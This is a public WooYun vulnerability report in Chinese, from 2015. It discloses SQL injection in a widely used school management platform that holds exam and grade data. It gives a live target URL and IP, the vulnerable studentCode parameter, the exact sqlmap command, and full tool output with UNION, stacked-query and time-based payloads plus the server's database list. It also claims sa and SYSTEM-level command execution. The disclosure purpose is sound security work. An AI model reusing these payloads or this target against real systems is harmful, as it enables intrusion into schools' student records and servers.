当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095875

漏洞标题:某通用校园数字平台存在SQL注入

相关厂商:东方博冠

漏洞作者: 黑色二进制

提交时间:2015-02-06 12:31

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某通用校园数字平台存在SQL注入

详细说明:

西安博冠网络科技有限公司--网上阅卷系统、行政管理系统、教务管理系统、成绩管理系统、考核评价系统、后勤管理系统。
校园综合数字管理平台 博冠科技 版权所有
使用这一平台的学校还是比较多的

google.jpg


好吧 期考完上学校网站查成绩时发现的一个注入点..

http://116.252.221.148:9001/SSQ/BrowseTestImage.aspx?testImageCode=11111111111431045001000301&studentCode=140123&imageCount=2&CouseText=%E8%AF%AD%E6%96%87&ClassName=%E9%AB%98%E4%B8%8014%E7%8F%AD


登陆之后查看考卷 参数studentCode 加了个'or 1=1-- 总分直接把全校人成绩加一起了,明显有问题..

QQ截图20150204125252.jpg


直接爆数据库名 版本

QQ截图20150205184133.jpg


QQ截图20150205184149.jpg


burp抓包,扔sqlmap里跑.因为sqlmap默认的level1联合查询只会测试10个字段,所以直接指定24个columns,要不跑不出来的.

sqlmap -r ~/Desktop/yj.txt -p studentCode --union-cols 24 --dbs


爆出数据库

QQ截图20150205173511.jpg


root@kali:~/Desktop# sqlmap -r ~/Desktop/yj.txt -p studentCode --union-cols 24 --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:50:29
[23:50:29] [INFO] parsing HTTP request from '/root/Desktop/yj.txt'
[23:50:29] [INFO] resuming back-end DBMS 'microsoft sql server' 
[23:50:29] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: studentCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 24 columns (custom)
    Payload: testImageCode=11111111111431045002000301&studentCode=-5476' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(117)+CHAR(117)+CHAR(101)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(70)+CHAR(79)+CHAR(113)+CHAR(104)+CHAR(75)+CHAR(66)+CHAR(112)+CHAR(80)+CHAR(113)+CHAR(106)+CHAR(101)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imageCount=2&CouseText=%E6%95%B0%E5%AD%A6&ClassName=%E9%AB%98%E4%B8%8014%E7%8F%AD
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: testImageCode=11111111111431045002000301&studentCode=140793'; WAITFOR DELAY '0:0:5'--&imageCount=2&CouseText=%E6%95%B0%E5%AD%A6&ClassName=%E9%AB%98%E4%B8%8014%E7%8F%AD
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: testImageCode=11111111111431045002000301&studentCode=140793' WAITFOR DELAY '0:0:5'--&imageCount=2&CouseText=%E6%95%B0%E5%AD%A6&ClassName=%E9%AB%98%E4%B8%8014%E7%8F%AD
---
[23:50:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[23:50:29] [INFO] fetching database names
[23:50:29] [INFO] the SQL query used returns 15 entries
[23:50:29] [INFO] resumed: "HC_NNDEZX"
[23:50:29] [INFO] resumed: "LumigentDemoDB"
[23:50:29] [INFO] resumed: "master"
[23:50:29] [INFO] resumed: "model"
[23:50:29] [INFO] resumed: "msdb"
[23:50:29] [INFO] resumed: "NNEZZSOS"
[23:50:29] [INFO] resumed: "OMSDB"
[23:50:29] [INFO] resumed: "SASDB"
[23:50:29] [INFO] resumed: "SMSDBALL_131"
[23:50:29] [INFO] resumed: "SMSDBALL_132"
[23:50:29] [INFO] resumed: "SMSDBALL_141"
[23:50:29] [INFO] resumed: "SMSPNNEZ"
[23:50:29] [INFO] resumed: "SMSPNNEZtest"
[23:50:30] [INFO] resumed: "SMSUIALL"
[23:50:30] [INFO] resumed: "tempdb"
available databases [15]:                                                                                         
[*] HC_NNDEZX
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] NNEZZSOS
[*] OMSDB
[*] SASDB
[*] SMSDBALL_131
[*] SMSDBALL_132
[*] SMSDBALL_141
[*] SMSPNNEZ
[*] SMSPNNEZtest
[*] SMSUIALL
[*] tempdb
[23:50:30] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/116.252.221.148'
[*] shutting down at 23:50:30


而且当前用户居然是sa..

QQ截图20150205150750.jpg


可爆出各种敏感数据

QQ截图20150205150544.jpg


可以直接远程执行命令 而且是system权限

QQ截图20150205151008.jpg


因为目标在内网..我也在内网..进一步渗透就不做了..

漏洞证明:

QQ截图20150205184133.jpg


QQ截图20150205173511.jpg

修复方案:

过滤..

版权声明:转载请注明来源 黑色二进制@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝